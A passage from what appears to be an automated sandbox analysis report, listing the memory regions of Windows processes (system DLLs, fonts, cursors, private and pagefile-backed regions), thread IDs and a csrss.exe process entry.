end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36638 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36639 start_va = 0xc00000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 36640 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36693 start_va = 0x75c00000 end_va = 0x75c03fff entry_point = 0x75c00000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36694 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36695 start_va = 0xc40000 end_va = 0x1bc2fff entry_point = 0xc40000 region_type = mapped_file name = "batang.ttc" filename = "\\Windows\\Fonts\\batang.ttc" (normalized: "c:\\windows\\fonts\\batang.ttc") Region: id = 36696 start_va = 0xc40000 end_va = 0x1925fff entry_point = 0xc40000 region_type = mapped_file name = "gulim.ttc" filename = "\\Windows\\Fonts\\gulim.ttc" (normalized: "c:\\windows\\fonts\\gulim.ttc") Region: id = 36697 start_va = 0xc40000 end_va = 0x1062fff entry_point = 0xc40000 region_type = mapped_file name = "malgun.ttf" filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf") Region: id = 36698 start_va = 0xc40000 end_va = 0x108efff entry_point = 0xc40000 region_type = mapped_file name = "malgunbd.ttf" filename = "\\Windows\\Fonts\\malgunbd.ttf" (normalized: "c:\\windows\\fonts\\malgunbd.ttf") Region: id = 36699 start_va = 0xc40000 end_va = 0x1557fff entry_point = 0xc40000 region_type = mapped_file name = "meiryo.ttc" filename = "\\Windows\\Fonts\\meiryo.ttc" (normalized: "c:\\windows\\fonts\\meiryo.ttc") Region: id = 36700 start_va = 0xc40000 end_va = 0x158cfff entry_point = 0xc40000 region_type = mapped_file name = "meiryob.ttc" filename = "\\Windows\\Fonts\\meiryob.ttc" (normalized: "c:\\windows\\fonts\\meiryob.ttc") Region: id = 36701 start_va = 0xc40000 end_va = 0x20e8fff entry_point = 0xc40000 region_type = mapped_file name = "msjh.ttf" filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf") Region: id = 36702 start_va = 0xc40000 end_va = 0x1a16fff entry_point = 0xc40000 region_type = mapped_file name = "msjhbd.ttf" filename = "\\Windows\\Fonts\\msjhbd.ttf" (normalized: "c:\\windows\\fonts\\msjhbd.ttf") Region: id = 36703 start_va = 0xc40000 end_va = 0x2102fff entry_point = 0xc40000 region_type = mapped_file name = "msyh.ttf" filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf") Region: id = 36704 start_va = 0xc40000 end_va = 0x1a2dfff entry_point = 0xc40000 region_type = mapped_file name = "msyhbd.ttf" filename = "\\Windows\\Fonts\\msyhbd.ttf" (normalized: "c:\\windows\\fonts\\msyhbd.ttf") Region: id = 36705 start_va = 0xc40000 end_va = 0x2af9fff entry_point = 0xc40000 region_type = mapped_file name = "mingliu.ttc" filename = "\\Windows\\Fonts\\mingliu.ttc" (normalized: "c:\\windows\\fonts\\mingliu.ttc") Region: id = 36706 start_va = 0xc40000 end_va = 0x2c7dfff entry_point = 0xc40000 region_type = mapped_file name = "mingliub.ttc" filename = "\\Windows\\Fonts\\mingliub.ttc" (normalized: "c:\\windows\\fonts\\mingliub.ttc") Region: id = 36707 start_va = 0xc40000 end_va = 0x1500fff entry_point = 0xc40000 region_type = mapped_file name = "msgothic.ttc" filename = "\\Windows\\Fonts\\msgothic.ttc" (normalized: "c:\\windows\\fonts\\msgothic.ttc") Region: id = 36708 start_va = 0xc40000 end_va = 0x15d7fff entry_point = 0xc40000 region_type = mapped_file name = "msmincho.ttc" filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc") Region: id = 36709 start_va = 0x4d0000 end_va = 0x54efff entry_point = 0x4d0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 36710 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 36711 start_va = 0x4d0000 end_va = 0x549fff entry_point = 0x4d0000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 36712 start_va = 0xc40000 end_va = 0x1addfff entry_point = 0xc40000 region_type = mapped_file name = "simsun.ttc" filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc") Region: id = 36713 start_va = 0xc40000 end_va = 0x1af1fff entry_point = 0xc40000 region_type = mapped_file name = "simsunb.ttf" filename = "\\Windows\\Fonts\\simsunb.ttf" (normalized: "c:\\windows\\fonts\\simsunb.ttf") Region: id = 36714 start_va = 0xaa0000 end_va = 0xb4afff entry_point = 0xaa0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 36715 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 36716 start_va = 0x4d0000 end_va = 0x56ffff entry_point = 0x4d0000 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 36729 start_va = 0x200000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 36753 start_va = 0xd0000 end_va = 0xeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 36754 start_va = 0x75c00000 end_va = 0x75c03fff entry_point = 0x75c00000 region_type = mapped_file name = "kbdus.dll" filename = "\\Windows\\System32\\KBDUS.DLL" (normalized: "c:\\windows\\system32\\kbdus.dll") Region: id = 36755 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36756 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36757 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_arrow.cur" filename = "\\Windows\\Cursors\\aero_arrow.cur" (normalized: "c:\\windows\\cursors\\aero_arrow.cur") Region: id = 36758 start_va = 0x6a0000 end_va = 0xa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 36759 start_va = 0x4d0000 end_va = 0x50dfff entry_point = 0x4d0000 region_type = mapped_file name = "aero_busy.ani" filename = "\\Windows\\Cursors\\aero_busy.ani" (normalized: "c:\\windows\\cursors\\aero_busy.ani") Region: id = 36760 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_up.cur" filename = "\\Windows\\Cursors\\aero_up.cur" (normalized: "c:\\windows\\cursors\\aero_up.cur") Region: id = 36761 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_nwse.cur" filename = "\\Windows\\Cursors\\aero_nwse.cur" (normalized: "c:\\windows\\cursors\\aero_nwse.cur") Region: id = 36762 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_nesw.cur" filename = "\\Windows\\Cursors\\aero_nesw.cur" (normalized: "c:\\windows\\cursors\\aero_nesw.cur") Region: id = 36763 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_ew.cur" filename = "\\Windows\\Cursors\\aero_ew.cur" (normalized: "c:\\windows\\cursors\\aero_ew.cur") Region: id = 36764 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_ns.cur" filename = "\\Windows\\Cursors\\aero_ns.cur" (normalized: "c:\\windows\\cursors\\aero_ns.cur") Region: id = 36765 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_move.cur" filename = "\\Windows\\Cursors\\aero_move.cur" (normalized: "c:\\windows\\cursors\\aero_move.cur") Region: id = 36766 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_unavail.cur" filename = "\\Windows\\Cursors\\aero_unavail.cur" (normalized: "c:\\windows\\cursors\\aero_unavail.cur") Region: id = 36767 start_va = 0x4d0000 end_va = 0x50dfff entry_point = 0x4d0000 region_type = mapped_file name = "aero_working.ani" filename = "\\Windows\\Cursors\\aero_working.ani" (normalized: "c:\\windows\\cursors\\aero_working.ani") Region: id = 36768 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_helpsel.cur" filename = "\\Windows\\Cursors\\aero_helpsel.cur" (normalized: "c:\\windows\\cursors\\aero_helpsel.cur") Region: id = 36769 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_pen.cur" filename = "\\Windows\\Cursors\\aero_pen.cur" (normalized: "c:\\windows\\cursors\\aero_pen.cur") Region: id = 36770 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "aero_link.cur" filename = "\\Windows\\Cursors\\aero_link.cur" (normalized: "c:\\windows\\cursors\\aero_link.cur") Region: id = 36771 start_va = 0x75c00000 end_va = 0x75c05fff entry_point = 0x75c00000 region_type = mapped_file name = "wls0wndh.dll" filename = "\\Windows\\System32\\WlS0WndH.dll" (normalized: "c:\\windows\\system32\\wls0wndh.dll") Region: id = 36772 start_va = 0xc40000 end_va = 0x183ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 36773 start_va = 0x4d0000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36774 start_va = 0x5c0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 36775 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36776 start_va = 0x18f0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 36777 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36778 start_va = 0x1930000 end_va = 0x1bfefff entry_point = 0x1930000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37084 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 37085 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 37086 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 37087 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37112 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37320 start_va = 0x1890000 end_va = 0x18cffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 37321 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37322 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37323 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37324 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 37325 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 37360 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 37361 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37362 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37363 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37364 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37365 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37366 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37367 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37368 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37369 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37370 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37371 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37372 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37373 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37374 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 37692 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Thread: id = 1036 os_tid = 0x164 Thread: id = 1043 os_tid = 0x190 Thread: id = 1044 os_tid = 0x194 Thread: id = 1053 os_tid = 0x1b4 Thread: id = 1054 os_tid = 0x1b8 Thread: id = 1056 os_tid = 0x1c8 Thread: id = 1065 os_tid = 0x1f4 Thread: id = 1111 os_tid = 0x2b8 Process: id = "665" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x7f1d1040" os_pid = "0x16c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "663" os_parent_pid = "0x158" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36564 start_va = 0x0 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x (null)" filename = "" Region: id = 36565 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 36566 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 36567 start_va = 0x4a300000 end_va = 0x4a304fff entry_point = 0x4a300000 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 36568 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36569 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36570 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36571 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 36572 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36573 start_va = 0x75cb0000 end_va = 0x75cbcfff entry_point = 0x75cb0000 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 36574 start_va = 0x100000 end_va = 0x166fff entry_point = 0x100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36575 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 36576 start_va = 0x75c70000 end_va = 0x75c9bfff entry_point = 0x75c70000 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 36577 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca0000 region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 36578 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36579 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36580 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36581 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36582 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36583 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36584 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36585 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36593 start_va = 0x170000 end_va = 0x176fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 36594 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 36595 start_va = 0x1d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 36596 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 36597 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x2f0000 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 36598 start_va = 0x470000 end_va = 0x862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 36599 start_va = 0x8b0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 36600 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 36601 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36602 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36603 start_va = 0x75c60000 end_va = 0x75c68fff entry_point = 0x75c60000 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 36604 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 36605 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 36606 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36607 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36787 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 36788 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 36789 start_va = 0xa70000 end_va = 0xb37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 36790 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 36791 start_va = 0xcb0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 36792 start_va = 0xcf0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 36793 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36794 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37457 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x1a0000 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 37458 start_va = 0x1b0000 end_va = 0x1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 37459 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 37460 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 37461 start_va = 0xb40000 end_va = 0xbbefff entry_point = 0xb40000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 37462 start_va = 0xd30000 end_va = 0x192ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 37463 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 37464 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37465 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37466 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 37476 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 37513 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 37514 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37517 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37524 start_va = 0x350000 end_va = 0x350fff entry_point = 0x350000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 37525 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 37542 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37553 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37665 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37670 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37682 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38528 start_va = 0x1930000 end_va = 0x19cffff entry_point = 0x1930000 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 38563 start_va = 0x170000 end_va = 0x176fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 38564 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 38565 start_va = 0x470000 end_va = 0x862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 38566 start_va = 0x350000 end_va = 0x353fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38576 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38627 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38628 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38688 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 38689 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 38713 start_va 